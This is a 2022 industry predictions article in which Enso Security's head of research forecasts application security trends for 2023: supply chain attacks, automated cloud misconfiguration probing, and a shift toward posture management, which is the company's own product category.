Virtualization Technology News and Information
Enso Security 2023 Predictions: A New Security Paradigm for Application Security


Industry executives and experts share their predictions for 2023.  Read them in this 15th annual series exclusive.

A New Security Paradigm for Application Security

By Omer Yaron, Head of Research at Enso Security

Between attackers gaining speed and sophistication, and developers growing in number and constantly accelerating their development flow, security teams in the application security sector are inundated with noise, conflicts and increasing risk. Even with the tremendous impact that the ‘shift-left' movement has had on security, as well as new and more agile solutions built to make the AppSec process more efficient and streamlined, we at Enso Security, the industry's first Application Security Posture Management (ASPM) solution, believe that 2023 will require a paradigm shift if AppSec professionals want to be proactive security leaders.

Supply chain attacks on code

While attacks on supply chains aren't a new phenomenon, they are growing in volume and taking on new and concerning vectors as they spread to new attack surfaces. We are noticing an evolution in these breaches, which are now focusing on public package repositories and compromising open source maintainers, as open source software and the supply chains integrated into it become highly attractive targets for malicious actors. Potential malicious code executed on CI, production, or local developer station environments will require AppSec professionals to fortify their arsenal of incident response capabilities. As these attacks escalate, organizations will need to ensure their ability to see, confirm and assess their CI build logs in order to quickly ascertain if any malicious code was run, and understand which related assets have been compromised. Without scaling these abilities, AppSec teams will find it difficult to anticipate and react to breaches of third-party packages.

Automated malicious probers on the loose

The use of automated malicious probers to exploit misconfigurations in the cloud is a trend we recognized in 2021, and one which will continue to be relevant in the year(s) to come. As cloud computing keeps scaling and becoming the go-to environment for businesses of all sizes that now rely on cloud providers, attackers will leverage the inescapable reality of misconfigurations that are more difficult to detect in the cloud and use automation to scan big cloud providers for easily exploitable misconfigurations, at scale. While improving efficiency, productivity and business processes across the board, cloud environments require entirely different security strategies than traditional, on-prem environments do. Application security leaders will be required to focus on self-probing tools and cloud security tools in order to ensure that they will be the first to detect any misconfigurations before attackers do.

Managing posture, not issues

AppSec teams have been locked in a dizzying cat-and-mouse game with attackers. As malicious actors grow in sophistication, they have a direct impact on how AppSec professionals assess and prioritize their budgets, timelines and strategic processes. AppSec teams were forced to run after defects and developers, racing to keep up with both the scale of attacks and the agility of developers. Today and much more going forward, we will see AppSec programs turning to holistic management of all resources, processes and teams, rather than continuing to lose at a game they weren't equipped for. Application Security Posture Management (ASPM) is a significant paradigm shift enabling teams to manage the application's resources in a risk-based manner, with proper correlation with the organization's critical assets. For developers, this shift is a welcome respite from what they may deem excessive security interference. They will be able to continue scaling their productivity while keeping track of the most critical tasks required to improve the overall security posture in the organization.

In 2023, application security will complete its evolution from a cybersecurity niche space to a full-fledged business, development and security priority for organizations of all sizes. A paradigm shift is required in order to do so, allowing AppSec to become more focused and effective, and empowering teams to run a marathon, not a sprint, while matching developers in their agility and business-forward approach.



Omer Yaron 

Omer Yaron is the Head of Research at Enso Security. Prior to joining Enso, he was the Cyber Security Team Lead at and did incident response & digital forensics for the Israel National Cyber Directorate. 

Published Friday, November 18, 2022 7:31 AM by David Marshall
There are no comments for this post.
To post a comment, you must be a registered user. Registration is free and easy! Sign up now!
<November 2022>